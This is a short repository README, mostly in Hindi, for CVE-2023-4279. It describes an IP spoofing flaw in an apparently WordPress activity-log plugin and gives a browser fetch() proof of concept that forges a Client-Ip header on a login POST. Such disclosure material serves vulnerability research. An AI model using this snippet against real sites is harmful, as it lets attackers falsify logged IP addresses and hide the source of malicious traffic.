
CVE-2023-4279 भेद्यता के लिए रिपॉजिटरी।
CVE आईडी: CVE-2023-4279
भेद्यता प्रकार: आईपी पता स्पूफिंग
विवरण: यह प्लगइन संभावित अविश्वसनीय हेडर से क्लाइंट आईपी पते प्राप्त करता है, जिससे हमलावर को इसके मान में हेरफेर करने की अनुमति मिलती है। इसका उपयोग दुर्भावनापूर्ण ट्रैफ़िक के स्रोत को छिपाने के लिए किया जा सकता है।
पुनरुत्पादन के चरण:
1. In User Activity Log > Settings, enable the setting "Allow Ip Address of users to log." and save settings.
2. Run the following code in the web browser and note on the backend that the IP address has been faked.
await fetch("/wp-login.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
"Client-Ip": "8.8.8.8",
},
"body": "log=USERNAME&pwd=PASSWORD",
"method": "POST",
"mode": "cors",
"credentials": "include"
});
संदर्भ: